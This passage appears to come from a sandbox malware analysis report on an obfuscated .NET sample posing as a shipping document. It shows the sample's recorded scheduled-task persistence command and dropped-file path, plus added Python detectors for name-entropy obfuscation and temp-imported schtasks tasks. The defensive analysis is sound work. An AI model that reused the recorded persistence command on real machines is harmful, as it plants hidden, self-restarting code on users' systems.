                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, NA6WibgODSO7bBliZq.cs High entropy of concatenated method names: 'oDA7tyc2GW', 'oJl7SQ8PN7', 'eot7QTbc0v', 'LV37ZhYI8W', 'S447RDni84', 'bsc7W7VMeb', 'pHN7j589dF', 'NmU7gpNuK8', 'MSy7iTkwvO', 'BIf7FKqdcs'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, C4mUUbO6hDslyPplLx.cs High entropy of concatenated method names: 'M3gQk5nfaw', 'L0hQMPdF1K', 'qEKQEOLBHI', 'CKwQayxLjA', 'CQ8QLkVYf2', 'zNtQ8pYao6', 'bL6Q4jAtFE', 'aIsQBkd8Su', 'oF9QYEYZOm', 'bhPQ5YA0gu'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, q9fnjc5GYGvmhbZoiW.cs High entropy of concatenated method names: 'HSX3ZOo1rM', 'VRL3R23frN', 'cC93WqMlFe', 'L9W3jMuDfV', 'qSq3TwEHdp', 'jgC3g9Eqj6', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, wt7q5lobhYgW243oOm.cs High entropy of concatenated method names: 'k0SVOR1VSK', 'T1QVr7tpyJ', 'fcEVUTeIx2', 'W9SVuBsuj4', 'yhHVhkNTfa', 'DfxV6aaeql', 'hHsVNE0mSn', 'K1YVGiadEL', 'PWVVnPhjp4', 'WQ7V1F1sWX'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, XvYxlglRiOic6hbTcl.cs High entropy of concatenated method names: 'JBcXj4mUUb', 'JhDXgslyPp', 'ldbXFDbyaI', 'SNQXv5WxWi', 'ceSXwpNZdN', 'ocxX9RmsH2', 'uWbPBYClg5TnrwgXcF', 'PwOV5rhZOw3hWpatPJ', 'sW23f50HDYi4H4ZftZ', 'cfdXXcVNxe'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, fQqeR9amxnwgk5W4Ox.cs High entropy of concatenated method names: 'rklKFyRHZI', 'Ya3KvCsvgd', 'ToString', 'IsRKSOs3dj', 'dmDKQe62DO', 'ykQKZPcR4e', 'xcxKR56JhE', 'JpfKW03YXR', 'fgCKjnm3iE', 'nQ8KgrYBUY'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, wciwk9zEOG6uX91csF.csHigh entropy of concatenated method names: 'sqx3cHcMrB', 'j273Oicemd', 'MhN3r1tGkP', 'Dja3USOlI4', 'bNr3uxC4A2', 'E2K3huEeoq', 'P6936cROAI', 'hW93dv7YEs', 'ej73DNkkFO', 'Ybc3paq1hu'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, IPBBsTXXF8uETShpuYk.csHigh entropy of concatenated method names: 'LZV35YTZ3O', 'JKf3zbyDY2', 'wQobPadTtQ', 'kwSbXH7c9L', 'EQubCOFfZj', 'qtdb79PiM9', 'UTablBWWOg', 'WuTbtRR4nk', 'AhsbS7Rl5j', 'PRCbQDOkKg'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, hB07IUQyTvRe7o7MWA.csHigh entropy of concatenated method names: 'Dispose', 'trRXYT2pZK', 'pAwCuIk4s7', 'uYe2Enj6h1', 'KabX5CxUCW', 'AC1XzaWPwJ', 'ProcessDialogKey', 'GfuCPOqrpM', 'lJDCXTShMR', 'SFiCCK9fnj'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, Iw0uX58lMeHcnwybv3.csHigh entropy of concatenated method names: 'khGKBtsbvb', 'HeRK5KoCQZ', 'AWOfPnMYHF', 'SXDfX1imC6', 'L44K1J6uGV', 'ubAKm4ehc1', 'PeOKoXGHCC', 'JbAKkdG0vO', 'GblKMKh1yK', 'K4iKEqI2GB'
                    Source: 0.2.Shipment advice H-BL Draft.exe.7d10000.5.raw.unpack, SOukgNJWlMylIaVTis.csHigh entropy of concatenated method names: 'dGojDW4JtW', 'svkjpF6LjC', 'rj1jxyXWqv', 'FELj2bjnNt', 'twEjsLh0Wp', 'swnjckKvxR', 'QgLjHokDLh', 'P3tjOeLk36', 'tqFjrNQPeP', 'SsMjeOPldL'
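                    The rows above are the sandbox's renaming-obfuscation heuristic: when a class's method names read as random alphanumerics, the concatenated string carries far more entropy per character than real identifiers do. Names such as 'Dispose', 'ToString' and 'Next' still appear among the random ones because they override framework members and an obfuscator cannot rename them without breaking the program. The Python below is an added example, not part of the Joe Sandbox report or of the sample, that reproduces the check on method names copied from two of the rows above and on a benign baseline class constructed for comparison. The 4.7 bits-per-character cut-off is an assumption chosen for illustration; the report does not state the threshold Joe Sandbox uses.

```python
"""Obfuscation check: Shannon entropy of a class's concatenated method names."""
import math
from collections import Counter
from typing import Dict, List, Tuple

# Assumed threshold in bits per character; the report does not publish Joe Sandbox's value.
ENTROPY_THRESHOLD = 4.7

# Method names copied from two report rows above (class name -> method names).
REPORT_CLASSES: Dict[str, List[str]] = {
    "ixWiGNeOm65DW7eSpN": ["hjGRsGPqCl", "owuRHLjDpF", "q1ZZyFmTWm", "J4qZhCMx0V", "MB9Z6B6aMY",
                           "gK6ZIVSYhX", "ebYZNdOawB", "qVnZGiEFKc", "Ql0ZJjnKMn", "C7qZn2G4P7"],
    "ulbq95Xlxcu8p7KeyGb": ["CanConvertFrom", "ConvertFrom", "ConvertTo", "HtQATCLh4b", "FfVA3ZKo91",
                            "QF6Abf45d6", "PmbAA0F170", "G2KAq2JLWs", "KdgA0Hhbvu", "vXXAdg2uNY"],
}

# Constructed baseline: the kind of method set an unobfuscated .NET type converter exposes.
BENIGN_CLASS: List[str] = ["CanConvertFrom", "ConvertFrom", "ConvertTo", "ToString",
                           "Dispose", "Equals", "GetHashCode"]


def shannon_entropy(text: str) -> float:
    """Bits per character of `text`; 0.0 for an empty string."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def score_class(method_names: List[str], threshold: float = ENTROPY_THRESHOLD) -> Tuple[float, bool]:
    """Entropy of the concatenated names (rounded) and whether it exceeds the threshold."""
    entropy = shannon_entropy("".join(method_names))
    return round(entropy, 3), entropy > threshold


def scan(classes: Dict[str, List[str]]) -> Dict[str, Tuple[float, bool]]:
    """Score every class in a {class_name: [method names]} map."""
    return {name: score_class(names) for name, names in classes.items()}


if __name__ == "__main__":
    results = scan({**REPORT_CLASSES, "BenignBaseline": BENIGN_CLASS})
    for cls, (entropy, flagged) in results.items():
        print(f"{cls:22} entropy={entropy:.3f} {'OBFUSCATED' if flagged else 'ok'}")
```

                    Both report classes score above 5 bits per character while the benign baseline stays near 4.2, so the concatenation approach tolerates a few unrenamed framework overrides mixed in. The measure is only meaningful once a class has a reasonable number of names; a type with two or three methods gives an entropy figure dominated by chance, so apply it per class and look at the distribution across the assembly rather than at any single class.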
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | File created: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" /XML "C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp"
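                    This command line is the persistence mechanism behind the "Scheduled temp file as task from temp location" Sigma hit in the signature list: the task definition is written to %TEMP% and imported with /XML, so the schtasks command line itself never names the payload, and the payload is only visible inside the imported XML. The Python below is an added example, not part of the Joe Sandbox report, that reproduces the detection on the recorded command line and then inspects the task definition for the action it registers. The task XML is constructed, because the report does not show the contents of tmpFBC0.tmp; its action path pointing at the dropped PrcGlGVKeUCXxg.exe under AppData\Roaming is an assumption taken from the dropped-file row above, and the logon trigger and hidden flag are assumptions as well.

```python
"""Detect schtasks persistence that imports its task definition from a temp directory."""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

# Command line as recorded in the Boot Survival row of the report.
REPORT_CMDLINE = (
    r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PrcGlGVKeUCXxg" '
    r'/XML "C:\Users\user\AppData\Local\Temp\tmpFBC0.tmp"'
)

# Constructed task definition standing in for tmpFBC0.tmp, whose contents the report
# does not show. The Command path is assumed from the dropped file the report lists;
# the logon trigger and Hidden setting are assumptions for illustration.
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
  </Triggers>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec><Command>C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe</Command></Exec>
  </Actions>
</Task>"""

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
TEMP_MARKERS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def _switch_value(cmdline: str, switch: str) -> Optional[str]:
    """Value following /<switch>, quoted or bare; schtasks switches are case-insensitive."""
    m = re.search(r"/" + switch + r'\s+(?:"([^"]*)"|(\S+))', cmdline, re.IGNORECASE)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def parse_schtasks_create(cmdline: str) -> Optional[Dict[str, object]]:
    """Task name and /XML path of a 'schtasks /Create' command line, else None."""
    if not re.search(r"schtasks(\.exe)?\b", cmdline, re.IGNORECASE):
        return None
    if not re.search(r"/create\b", cmdline, re.IGNORECASE):
        return None
    return {"task_name": _switch_value(cmdline, "TN"), "xml_path": _switch_value(cmdline, "XML")}


def in_temp_dir(path: str) -> bool:
    """True when the path sits under a per-user or system temp directory."""
    low = path.lower().replace("/", "\\")
    return any(marker in low for marker in TEMP_MARKERS)


def parse_task_xml(xml_text: str) -> Dict[str, object]:
    """Pull the action command, Hidden flag and trigger types out of a task definition."""
    root = ET.fromstring(xml_text)
    cmd = root.find(".//t:Actions/t:Exec/t:Command", TASK_NS)
    hidden = root.find(".//t:Settings/t:Hidden", TASK_NS)
    trig = root.find("t:Triggers", TASK_NS)
    return {
        "command": cmd.text.strip() if cmd is not None and cmd.text else None,
        "hidden": hidden is not None and (hidden.text or "").strip().lower() == "true",
        "triggers": [el.tag.split("}")[-1] for el in trig] if trig is not None else [],
    }


def assess(cmdline: str, task_xml: Optional[str] = None) -> Optional[Dict[str, object]]:
    """Combine command-line and task-definition signals into one finding (None if not schtasks /Create)."""
    finding = parse_schtasks_create(cmdline)
    if finding is None:
        return None
    reasons: List[str] = []
    xml_path = finding["xml_path"]
    if isinstance(xml_path, str) and in_temp_dir(xml_path):
        reasons.append("task definition imported from a temp directory")
    if task_xml:
        details = parse_task_xml(task_xml)
        finding.update(details)
        command = details["command"]
        if isinstance(command, str) and "\\appdata\\roaming\\" in command.lower():
            reasons.append("task action runs a binary under AppData\\Roaming")
        if details["hidden"]:
            reasons.append("task is marked hidden")
    finding["reasons"] = reasons
    finding["suspicious"] = bool(reasons)
    return finding


if __name__ == "__main__":
    print(assess(REPORT_CMDLINE, SAMPLE_TASK_XML))
```

                    The command-line check alone is enough to raise the alert, which is what the Sigma rule does. For triage, feed the task definition itself to parse_task_xml: it is available in the Security log as the TaskContent field of event 4698, or on disk under C:\Windows\System32\Tasks\Updates\PrcGlGVKeUCXxg once the task is registered (those files are XML, commonly UTF-16, so decode them to text before parsing). The temp file named on the command line is usually deleted right after import, which is why the action path has to come from one of those two places rather than from the tmp file.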

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (8 identical entries in the report)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (6 identical entries in the report)
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe | Process information set: NOOPENFILEERRORBOX (48 identical entries in the report)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match File source: Process Memory Space: Shipment advice H-BL Draft.exe PID: 7548, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 1340, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Memory allocated: 16B0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Memory allocated: 3120000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Memory allocated: 5120000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Memory allocated: 7EC0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Memory allocated: 8EC0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Memory allocated: 9070000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Memory allocated: A070000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Memory allocated: DF0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Memory allocated: 29A0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Memory allocated: 49A0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Memory allocated: 18B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Memory allocated: 3360000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Memory allocated: 7980000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Memory allocated: 8980000 memory reserve | memory write watch
